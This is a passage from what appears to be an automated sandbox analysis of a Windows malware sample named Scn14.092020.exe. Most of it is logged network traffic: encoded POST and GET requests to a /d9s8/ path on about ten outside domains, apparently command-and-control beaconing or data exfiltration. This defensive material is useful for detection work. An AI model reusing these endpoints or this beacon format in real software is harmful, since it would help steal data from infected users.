62 72 6b 4f 52 4c 30 58 44 4b 71 6e 4c 57 5a 55 55 4e 6c 43 67 66 70 54 39 33 73 48 53 4d 66 43 6d 73 62 6d 51 74 68 64 7e 43 67 7a 39 6e 6f 33 66 34 6e 79 6a 44 38 47 31 4f 50 4b 4e 79 6a 66 6a 5f 68 44 34 4c 4d 50 62 69 4f 64 68 48 34 47 38 46 38 52 55 47 79 54 49 51 71 61 6f 47 54 43 56 4f 46 62 43 34 74 64 46 6e 33 50 4b 6c 30 59 42 76 52 61 78 79 41 59 79 4a 6e 6c 48 44 38 67 70 4d 75 34 51 67 74 74 62 48 6e 4b 77 6a 35 31 51 41 64 36 63 67 63 43 43 79 68 38 30 35 31 31 66 47 6d 68 41 36 44 33 63 76 34 70 32 4b 62 6d 45 45 43 64 69 55 59 2d 67 5a 50 59 52 6b 74 6d 7a 4b 74 5a 54 70 43 55 37 41 36 37 37 5f 47 34 72 57 41 53 30 78 55 6c 53 54 28 4a 6c 68 69 59 7e 59 6c 4f 6a 51 41 2e 00 00 00 00 00 00 00 00 Data Ascii: Fzr4zDK=gg1ok2Cv51TgYIkZWdpg21eOlrnFJxcYmNcqoolGrlgjFr3oIBl1rnzA96rL(_(722PgPZhybM9f5J9pvy~b5smvGOF6mCioaOt-9ovMNLGN5sD1G-tXRLr2z-vRbWqfUvVTYhQaWipbKRjxjlfS4vfnQ0RU841dc0RpsYHVEeTLj3cWbrkORL0XDKqnLWZUUNlCgfpT93sHSMfCmsbmQthd~Cgz9no3f4nyjD8G1OPKNyjfj_hD4LMPbiOdhH4G8F8RUGyTIQqaoGTCVOFbC4tdFn3PKl0YBvRaxyAYyJnlHD8gpMu4QgttbHnKwj51QAd6cgcCCyh80511fGmhA6D3cv4p2KbmEECdiUY-gZPYRktmzKtZTpCU7A677_G4rWAS0xUlST(JlhiY~YlOjQA.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.martjeje2.infoConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.martjeje2.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.martjeje2.info/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 34 48 4d 37 4e 2d 6f 43 42 38 37 65 6e 6b 59 78 64 43 75 7a 7e 4e 35 4d 71 5a 56 48 74 38 35 37 66 4a 47 36 6b 34 4a 74 66 35 6d 32 51 2d 77 63 72 6b 49 4e 74 6d 71 34 52 36 70 49 77 72 4d 55 6b 66 4f 5a 39 69 71 65 39 62 6a 79 33 49 54 79 30 64 62 76 6f 52 46 6a 7a 64 55 38 58 36 58 48 4f 6b 42 65 43 61 6a 4c 35 46 75 55 6d 66 37 62 6d 79 61 76 68 55 39 31 56 31 43 45 76 74 51 33 6a 4f 56 71 73 53 4e 35 56 78 4f 5f 47 68 35 65 45 34 34 50 39 77 42 47 49 76 53 71 35 44 43 68 78 57 45 75 50 62 54 36 4b 75 5a 52 49 44 4e 39 38 4a 41 6c 75 6b 50 32 51 6f 67 75 62 42 77 4e 52 39 4b 6b 46 4d 79 31 59 46 46 41 32 54 59 67 4d 35 75 4c 38 6e 4d 67 53 4d 28 74 41 63 41 68 6c 69 56 69 31 4b 30 36 73 33 48 76 76 7a 67 56 41 64 36 44 76 49 52 45 39 76 71 78 74 57 79 75 6a 5a 4f 4f 47 54 4f 6e 28 34 6a 77 28 5a 42 45 64 52 43 56 38 52 4e 4e 4e 4c 4d 56 4d 6b 35 6d 4b 47 4d 4d 75 4d 6c 46 55 38 6a 46 39 53 34 45 68 34 68 62 43 72 59 30 42 67 64 56 37 61 4e 51 63 30 76 4a 4b 61 52 48 4a 34 57 69 79 78 6b 6a 34 71 44 50 4b 68 7a 5a 6b 43 61 76 74 64 4b 70 77 39 45 76 37 44 7e 48 52 72 42 62 66 66 54 57 45 65 34 74 39 4f 51 63 79 54 63 42 41 70 58 79 31 59 55 4b 5a 66 64 76 46 48 44 30 69 36 56 39 5a 5a 67 38 71 74 6b 2e 00 00 00 00 00 00 00 00 Data Ascii: Fzr4zDK=4HM7N-oCB87enkYxdCuz~N5MqZVHt857fJG6k4Jtf5m2Q-wcrkINtmq4R6pIwrMUkfOZ9iqe9bjy3ITy0dbvoRFjzdU8X6XHOkBeCajL5FuUmf7bmyavhU91V1CEvtQ3jOVqsSN5VxO_Gh5eE44P9wBGIvSq5DChxWEuPbT6KuZRIDN98JAlukP2QogubBwNR9KkFMy1YFFA2TYgM5uL8nMgSM(tAcAhliVi1K06s3HvvzgVAd6DvIRE9vqxtWyujZOOGTOn(4jw(ZBEdRCV8RNNNLMVMk5mKGMMuMlFU8jF9S4Eh4hbCrY0BgdV7aNQc0vJKaRHJ4Wiyxkj4qDPKhzZkCavtdKpw9Ev7D~HRrBbffTWEe4t9OQcyTcBApXy1YUKZfdvFHD0i6V9ZZg8qtk.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.kq-iot.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.kq-iot.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kq-iot.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 70 69 64 69 57 76 47 65 70 4a 77 51 79 68 74 41 4f 73 77 54 76 62 46 52 78 78 4f 45 45 33 6b 7a 31 5f 76 6c 7a 41 7a 6c 46 67 39 68 46 53 35 62 58 42 30 30 44 5f 69 61 6d 62 4d 48 5a 33 73 55 64 55 4f 35 79 74 47 77 77 49 44 57 68 36 33 4e 75 4d 47 58 7e 63 45 6b 44 47 6f 36 69 70 76 39 44 5a 54 45 6c 4c 48 30 77 64 4a 43 4e 58 48 6b 76 4c 6b 30 48 79 38 6c 63 6d 38 57 51 33 35 77 7a 50 44 4a 52 33 4a 76 70 55 78 42 43 5f 73 6a 33 49 33 37 71 75 69 50 42 66 37 46 48 73 54 48 41 37 73 42 46 56 63 30 6a 43 54 54 56 70 75 4a 6c 6b 53 4d 70 61 71 64 78 36 33 50 6e 32 72 4b 79 39 4a 77 74 71 55 68 47 39 59 54 33 4a 54 50 66 34 4a 6b 4d 52 6d 38 72 56 73 48 51 68 59 7a 42 74 47 32 75 58 50 57 50 55 55 65 4f 77 65 77 70 61 7a 36 4b 6d 69 6d 64 42 54 38 57 4b 58 39 44 57 77 63 32 4f 77 33 6e 59 69 58 49 6a 70 46 35 75 74 71 69 68 28 68 72 5a 38 30 6d 4b 76 6a 30 4b 37 49 57 39 48 79 4d 74 66 6f 46 71 34 77 30 35 35 75 4a 57 77 57 65 44 47 43 4e 67 62 56 73 71 67 52 34 58 5a 6f 58 54 7e 57 6c 36 6d 7a 28 35 66 5a 46 5f 54 4e 28 4e 56 4c 57 76 34 72 58 62 45 4b 66 50 6c 36 65 6a 54 72 68 66 36 66 6d 74 6c 37 64 67 6d 42 72 49 50 4e 53 65 4e 6e 53 55 38 45 4b 31 39 57 53 57 47 58 38 6c 30 66 70 2d 47 2d 7e 69 55 2e 00 00 00 00 00 00 00 00 Data Ascii: Fzr4zDK=pidiWvGepJwQyhtAOswTvbFRxxOEE3kz1_vlzAzlFg9hFS5bXB00D_iambMHZ3sUdUO5ytGwwIDWh63NuMGX~cEkDGo6ipv9DZTElLH0wdJCNXHkvLk0Hy8lcm8WQ35wzPDJR3JvpUxBC_sj3I37quiPBf7FHsTHA7sBFVc0jCTTVpuJlkSMpaqdx63Pn2rKy9JwtqUhG9YT3JTPf4JkMRm8rVsHQhYzBtG2uXPWPUUeOwewpaz6KmimdBT8WKX9DWwc2Ow3nYiXIjpF5utqih(hrZ80mKvj0K7IW9HyMtfoFq4w055uJWwWeDGCNgbVsqgR4XZoXT~Wl6mz(5fZF_TN(NVLWv4rXbEKfPl6ejTrhf6fmtl7dgmBrIPNSeNnSU8EK19WSWGX8l0fp-G-~iU.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.ekcraftmasters.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.ekcraftmasters.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ekcraftmasters.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 66 2d 4b 73 53 52 78 45 69 75 39 46 7e 31 54 37 34 48 6f 2d 42 6a 6f 73 32 46 72 58 30 53 49 6b 64 72 66 4d 6a 5a 37 76 5a 72 53 58 47 35 6e 61 45 71 33 62 49 76 6c 43 7a 67 57 39 54 6b 62 56 45 73 47 6a 28 77 56 77 4b 6e 70 38 50 62 51 41 59 54 4c 76 55 50 46 47 46 61 44 6b 6c 38 59 6c 77 31 7e 4e 37 77 54 47 28 50 5a 59 49 33 56 71 30 4f 32 74 51 6f 7e 58 6a 69 7a 2d 37 43 54 6f 55 49 53 4e 4e 75 6c 4c 66 6f 6d 4a 4c 67 46 4a 28 6e 63 72 49 42 39 78 78 52 5a 33 31 54 6f 6a 65 79 63 4e 68 2d 43 4f 52 76 34 72 52 42 53 52 52 58 4d 6d 4d 2d 39 2d 32 4c 41 6c 78 2d 41 68 6d 55 5a 70 45 57 75 33 4c 63 73 72 4f 4b 49 44 74 71 63 6d 4e 4d 39 63 77 4e 75 32 59 52 6e 6e 6e 47 71 4d 6f 6b 74 59 75 41 4b 67 65 75 47 47 64 6e 71 57 38 41 64 44 35 44 76 39 55 68 73 72 68 57 48 45 76 77 6a 4e 59 6d 65 69 56 36 34 2d 4e 32 32 72 61 4a 49 4e 63 32 51 68 50 38 79 4c 38 32 69 52 77 45 70 70 45 38 68 63 70 39 4b 4a 31 30 75 42 55 78 43 5a 76 4c 6a 69 58 56 49 33 70 52 79 58 54 5a 70 53 66 31 7e 57 42 44 62 50 65 38 65 58 57 47 46 49 47 5a 51 5a 55 4a 70 6f 7a 57 56 75 46 58 45 36 6b 52 35 6d 62 44 68 6e 66 78 51 79 4a 71 78 68 38 4b 67 49 32 5f 31 72 43 4f 5a 32 59 30 61 2d 7a 77 46 49 46 4a 64 53 48 6e 43 6b 7e 2d 49 2e 00 00 00 00 00 00 00 00 Data Ascii: Fzr4zDK=f-KsSRxEiu9F~1T74Ho-Bjos2FrX0SIkdrfMjZ7vZrSXG5naEq3bIvlCzgW9TkbVEsGj(wVwKnp8PbQAYTLvUPFGFaDkl8Ylw1~N7wTG(PZYI3Vq0O2tQo~Xjiz-7CToUISNNulLfomJLgFJ(ncrIB9xxRZ31TojeycNh-CORv4rRBSRRXMmM-9-2LAlx-AhmUZpEWu3LcsrOKIDtqcmNM9cwNu2YRnnnGqMoktYuAKgeuGGdnqW8AdD5Dv9UhsrhWHEvwjNYmeiV64-N22raJINc2QhP8yL82iRwEppE8hcp9KJ10uBUxCZvLjiXVI3pRyXTZpSf1~WBDbPe8eXWGFIGZQZUJpozWVuFXE6kR5mbDhnfxQyJqxh8KgI2_1rCOZ2Y0a-zwFIFJdSHnCk~-I.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.hqxmf.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.hqxmf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hqxmf.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 6f 69 55 78 4d 6a 4b 44 46 67 6f 4c 38 66 49 6f 79 44 48 49 50 5a 37 43 4c 34 6d 45 4c 43 61 54 44 6a 4f 34 47 79 74 46 6d 32 70 79 56 49 74 59 66 44 72 35 76 4e 35 5a 56 39 42 64 36 5f 49 62 49 48 42 32 75 78 63 6d 59 50 7a 55 49 78 69 73 6d 4c 57 59 73 75 78 65 7a 4e 7e 75 54 6d 54 4e 38 76 72 58 31 73 52 5f 6e 52 6d 6c 73 58 6a 6a 55 4e 69 67 6a 47 37 30 63 6e 63 71 70 58 48 45 49 30 63 50 45 71 50 5a 4b 59 79 74 67 32 45 59 51 66 62 5f 59 39 68 41 30 4a 55 58 69 37 4a 39 79 34 64 63 4d 4f 4f 62 49 58 74 37 41 5a 4c 47 48 6e 4c 65 52 57 68 32 28 66 6d 44 39 2d 6c 62 47 47 61 62 54 5f 33 59 52 65 47 68 73 49 75 50 36 51 7a 48 42 30 4f 53 4b 4e 6b 71 44 65 4d 41 52 79 39 50 41 69 75 2d 4c 72 6f 41 4d 5f 71 4f 61 70 4e 4c 4f 38 4a 74 74 41 28 61 57 5f 35 74 6b 47 31 45 37 51 4b 74 4c 43 34 55 6b 46 64 33 55 67 7a 58 37 6e 45 36 44 4b 78 7a 41 59 33 71 67 5f 43 4a 77 32 77 57 63 71 73 75 6a 6f 52 71 4d 75 79 52 46 72 66 4d 6a 79 69 68 38 59 7a 4e 4c 6a 56 59 77 6f 46 6e 4f 7a 37 72 7e 43 4c 59 57 5f 6d 7a 78 4b 61 6e 71 43 4b 66 46 69 36 73 34 6a 79 5a 31 69 64 53 38 2d 5a 68 4f 5a 4d 65 64 64 35 54 28 64 77 34 4c 59 39 59 33 74 65 41 68 64 30 72 69 7a 6a 31 59 5f 50 57 6e 42 51 64 49 41 46 71 56 71 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: Fzr4zDK=oiUxMjKDFgoL8fIoyDHIPZ7CL4mELCaTDjO4GytFm2pyVItYfDr5vN5ZV9Bd6_IbIHB2uxcmYPzUIxismLWYsuxezN~uTmTN8vrX1sR_nRmlsXjjUNigjG70cncqpXHEI0cPEqPZKYytg2EYQfb_Y9hA0JUXi7J9y4dcMOObIXt7AZLGHnLeRWh2(fmD9-lbGGabT_3YReGhsIuP6QzHB0OSKNkqDeMARy9PAiu-LroAM_qOapNLO8JttA(aW_5tkG1E7QKtLC4UkFd3UgzX7nE6DKxzAY3qg_CJw2wWcqsujoRqMuyRFrfMjyih8YzNLjVYwoFnOz7r~CLYW_mzxKanqCKfFi6s4jyZ1idS8-ZhOZMedd5T(dw4LY9Y3teAhd0rizj1Y_PWnBQdIAFqVqo.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.panoramazoom.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.panoramazoom.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.panoramazoom.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 34 43 77 70 6b 62 4a 4e 35 41 51 41 66 44 47 77 48 55 42 54 53 5f 6c 46 4a 76 30 6c 6d 63 52 55 74 6f 66 38 6d 6b 4f 5f 70 69 65 42 65 32 32 6b 61 4e 54 6c 70 52 67 57 30 51 70 75 42 46 4e 59 79 69 64 31 70 4a 64 33 79 65 33 65 70 4b 49 32 66 4f 57 71 36 42 74 4b 76 4e 51 31 73 2d 47 5a 47 30 4a 7a 35 5f 4d 70 44 50 79 53 50 30 53 73 37 47 6a 7a 71 4b 4d 56 4f 43 57 64 73 55 73 41 79 59 63 6d 6a 73 52 6a 6d 47 30 77 50 34 77 50 5a 41 53 39 7e 6a 53 47 67 5f 57 46 72 48 72 49 74 70 7e 68 50 38 38 72 4b 4c 6f 57 7a 78 4e 6c 6b 43 70 71 52 41 45 61 4f 70 64 54 68 79 6a 32 30 6f 42 61 6b 51 68 6f 6c 69 54 51 56 77 28 31 62 30 45 39 4a 74 63 6a 62 51 33 6a 71 64 62 65 6d 6a 61 39 4d 56 75 63 46 50 68 59 6a 72 54 63 5a 44 73 4c 35 6f 78 68 49 39 6b 77 37 73 79 63 49 74 37 4f 30 6b 6f 7a 45 47 62 64 69 30 76 6c 39 71 46 4c 35 50 7e 6a 52 4b 78 61 71 7a 61 72 70 5f 79 6b 52 36 28 4f 65 5f 43 55 71 4f 6b 69 43 72 45 6f 52 63 7e 33 6e 44 59 6f 42 72 75 41 56 53 59 65 31 75 39 44 5a 4c 5a 4d 51 6b 35 4e 4f 6a 57 4f 75 52 49 78 47 55 37 36 53 50 46 33 59 4f 31 58 4d 73 4e 47 72 6a 61 5f 62 58 70 6a 51 75 4c 44 33 53 53 64 28 44 43 7a 47 33 63 59 79 37 46 51 57 45 69 69 75 37 47 7a 61 6c 47 37 5a 79 34 43 41 38 73 2e 00 00 00 00 00 00 00 00 Data Ascii: Fzr4zDK=4CwpkbJN5AQAfDGwHUBTS_lFJv0lmcRUtof8mkO_pieBe22kaNTlpRgW0QpuBFNYyid1pJd3ye3epKI2fOWq6BtKvNQ1s-GZG0Jz5_MpDPySP0Ss7GjzqKMVOCWdsUsAyYcmjsRjmG0wP4wPZAS9~jSGg_WFrHrItp~hP88rKLoWzxNlkCpqRAEaOpdThyj20oBakQholiTQVw(1b0E9JtcjbQ3jqdbemja9MVucFPhYjrTcZDsL5oxhI9kw7sycIt7O0kozEGbdi0vl9qFL5P~jRKxaqzarp_ykR6(Oe_CUqOkiCrEoRc~3nDYoBruAVSYe1u9DZLZMQk5NOjWOuRIxGU76SPF3YO1XMsNGrja_bXpjQuLD3SSd(DCzG3cYy7FQWEiiu7GzalG7Zy4CA8s.
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.ashleygrady.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.ashleygrady.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ashleygrady.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 35 7a 46 62 64 32 4b 48 67 36 74 6c 62 34 70 42 56 4d 44 33 46 4c 6a 34 4d 6d 76 79 4d 73 37 66 59 62 78 71 44 5a 7e 74 32 4e 7e 56 6f 51 33 42 6c 58 33 38 69 7a 69 66 61 77 43 62 28 70 4e 59 61 35 30 66 30 6e 35 73 7e 69 42 34 30 5f 33 56 65 78 63 67 36 56 43 36 49 59 59 2d 69 5f 6b 4f 78 62 56 6b 43 6f 7a 45 55 35 73 70 51 6d 48 68 57 52 34 72 6d 52 6f 66 38 68 6c 73 34 45 61 6a 6f 48 42 78 4f 36 6b 6f 55 38 4d 74 52 6e 52 4d 76 59 52 47 75 42 52 78 58 2d 73 45 45 6c 67 53 68 62 41 52 39 77 4d 4b 5a 33 33 4d 56 52 35 70 46 6b 54 46 6b 38 53 61 33 53 63 36 49 67 70 43 71 69 35 65 65 54 56 2d 69 34 51 69 62 5a 4a 7a 78 4b 55 79 55 42 41 64 36 52 37 6b 48 75 37 6f 59 77 35 53 5a 6f 4c 48 43 72 70 36 67 73 72 56 67 49 67 76 69 69 4b 58 4d 4c 73 34 54 35 46 50 32 50 42 39 32 72 74 4b 4e 42 62 31 7e 30 31 66 63 58 48 6b 41 4e 43 59 75 57 31 50 52 4f 31 4a 61 42 4c 74 6b 48 46 65 38 56 4f 5a 58 46 41 51 36 55 48 4c 71 6f 32 61 57 76 42 75 30 76 58 75 76 76 69 6e 36 78 42 52 59 45 75 37 41 6d 52 46 31 62 72 51 68 6e 47 36 75 31 46 43 66 77 73 5a 4c 31 5a 75 4a 75 48 44 73 35 54 55 4c 37 30 4e 77 44 4e 48 57 55 52 5f 6b 33 7e 77 28 5a 54 57 64 7a 61 70 7a 62 4e 47 62 44 6f 5a 36 59 68 55 67 54 35 2d 66 62 73 2e 00 00 00 00 00 00 00 00 Data Ascii: Fzr4zDK=5zFbd2KHg6tlb4pBVMD3FLj4MmvyMs7fYbxqDZ~t2N~VoQ3BlX38izifawCb(pNYa50f0n5s~iB40_3Vexcg6VC6IYY-i_kOxbVkCozEU5spQmHhWR4rmRof8hls4EajoHBxO6koU8MtRnRMvYRGuBRxX-sEElgShbAR9wMKZ33MVR5pFkTFk8Sa3Sc6IgpCqi5eeTV-i4QibZJzxKUyUBAd6R7kHu7oYw5SZoLHCrp6gsrVgIgviiKXMLs4T5FP2PB92rtKNBb1~01fcXHkANCYuW1PRO1JaBLtkHFe8VOZXFAQ6UHLqo2aWvBu0vXuvvin6xBRYEu7AmRF1brQhnG6u1FCfwsZL1ZuJuHDs5TUL70NwDNHWUR_k3~w(ZTWdzapzbNGbDoZ6YhUgT5-fbs.
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=yQsfb6F+aE13Jx6qI3j1CMlHibkP501s7Hi6bb3WKNeqcCrzTo1bPmy/qNeqrRFHbPNe/5B8Pw== HTTP/1.1Host: www.aktivasi-asuransi-bukalapak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Fzr4zDK=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bD544eiDWVMpw/c/g==&cj=VTjDONEhQdtp_D7 HTTP/1.1Host: www.keebcat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA93xRa5BlVihhxKWfRA== HTTP/1.1Host: www.nittayabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Fzr4zDK=VEf8k5jTZUymsLuztDlUroR4Tha6hY/2aUGXaeeuAgJZc/heECk8lEdTltPR5tJ2I5Jl1jMjmA==&cj=VTjDONEhQdtp_D7 HTTP/1.1Host: www.jblmhomestore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=viBS6Wze00HUNqFEE58ery/tqe73OVEI1otdtPhhnn8HDYG2Px46lSa5vqDPzebR02j5AZFkbQ== HTTP/1.1Host: www.chehol.directoryConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Fzr4zDK=3F4BTbkTDsrb23tZAXb3hdJ3+Zxxneo5KOr91LRTQbT8RfY+vB5Yp2XFHslzxo1OscfD9AW+8w==&cj=VTjDONEhQdtp_D7 HTTP/1.1Host: www.martjeje2.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=mgpYILHtvr0Mwg0MZYgF77N/xUypMH4IxLzlgyPIKQxLVyQFR0wmQaHW4IQmamE6UWjr48at2Q== HTTP/1.1Host: www.kq-iot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Fzr4zDK=Q8+WM2Bomf5ni0SwuCpoBHUW8n6b7DImGNKI7675UaWCEqnlNuWrArVDxgeCSXP0JeKD6A53Gw==&cj=VTjDONEhQdtp_D7 HTTP/1.1Host: www.ekcraftmasters.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=nggLSHHwBxgJuORrvzKJVs32BLSeJBWsdDbHUzpPnmBTU59XQSi8nYsaBuJZ1tItBxdMzB9YIA== HTTP/1.1Host: www.hqxmf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=nggLSHHwBxgJuORrvzKJVs32BLSeJBWsdDbHUzpPnmBTU59XQSi8nYsaBuJZ1tItBxdMzB9YIA== HTTP/1.1Host: www.hqxmf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?Fzr4zDK=3AET6+Fblh40BCXQRB4KEY1DB+MApctu3/uB71K+4nCKf3Spdfy3uFQQowE4NnJx4EY2v4wM1g==&cj=VTjDONEhQdtp_D7 HTTP/1.1Host: www.panoramazoom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?cj=VTjDONEhQdtp_D7&Fzr4zDK=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFRzM0ZtWPZ4zyVFx2w== HTTP/1.1Host: www.ashleygrady.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.aktivasi-asuransi-bukalapak.com
          Source: unknownHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.keebcat.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.keebcat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.keebcat.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 7a 72 34 7a 44 4b 3d 54 4d 41 68 30 41 6f 5f 46 75 46 5a 46 70 59 77 42 63 76 61 57 4b 65 46 6c 59 4a 53 53 30 79 42 4d 71 70 56 28 6a 38 47 65 4c 76 77 4f 6f 5a 56 43 56 76 34 73 38 64 48 7e 71 50 44 39 71 57 47 4e 31 56 45 73 77 54 4b 37 57 6a 37 46 36 7a 67 42 5f 56 73 6a 73 6b 5f 31 62 44 74 34 45 74 45 4b 42 4f 5a 54 38 5a 30 47 62 31 6f 4e 34 69 6d 78 32 76 36 66 58 33 38 67 57 75 4c 47 33 44 4c 6b 42 56 50 34 5f 78 61 46 30 31 59 6f 58 45 34 66 77 28 52 43 50 46 45 32 32 38 53 6a 2d 41 41 49 33 35 65 4a 71 69 51 73 50 32 6d 4e 47 42 44 71 4d 7e 58 56 64 59 43 47 47 69 69 54 57 44 4c 67 5a 31 55 4c 62 67 71 78 6a 43 6f 7e 73 48 58 6a 57 66 62 39 4e 78 4c 78 70 38 76 73 6a 77 4a 49 49 66 6f 48 34 72 38 48 4b 46 74 55 6e 31 5f 59 30 6f 4e 37 6c 4b 41 70 47 70 48 4e 70 4c 6d 7e 41 6d 32 36 39 6c 76 32 67 34 74 70 75 28 39 36 42 39 70 62 76 48 47 49 4c 4c 4f 70 2d 73 54 6e 64 76 2d 68 4a 4f 53 76 73 75 6d 36 46 68 67 62 43 4b 44 58 45 7a 47 78 72 71 31 7e 31 6f 59 57 7a 6d 6b 48 65 30 56 6c 6d 76 69 59 52 47 57 62 2d 43 4e 66 43 6e 49 70 70 28 4b 55 31 64 43 59 6e 34 34 4c 53 50 5a 74 6a 66 6d 4b 77 50 44 49 42 67 74 6e 73 34 6c 47 6d 43 38 4d 32 7a 4f 52 2d 35 46 79 65 74 47 7a 4c 30 6f 6a 4f 64 36 70 45 30 61 6d 57 55 2e 00 00 00 00 00 00 00 00 Data Ascii: Fzr4zDK=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tpu(96B9pbvHGILLOp-sTndv-hJOSvsum6FhgbCKDXEzGxrq1~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zOR-5FyetGzL0ojOd6pE0amWU.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Sep 2020 13:36:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: Scn14.092020.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: Scn14.092020.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: Scn14.092020.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
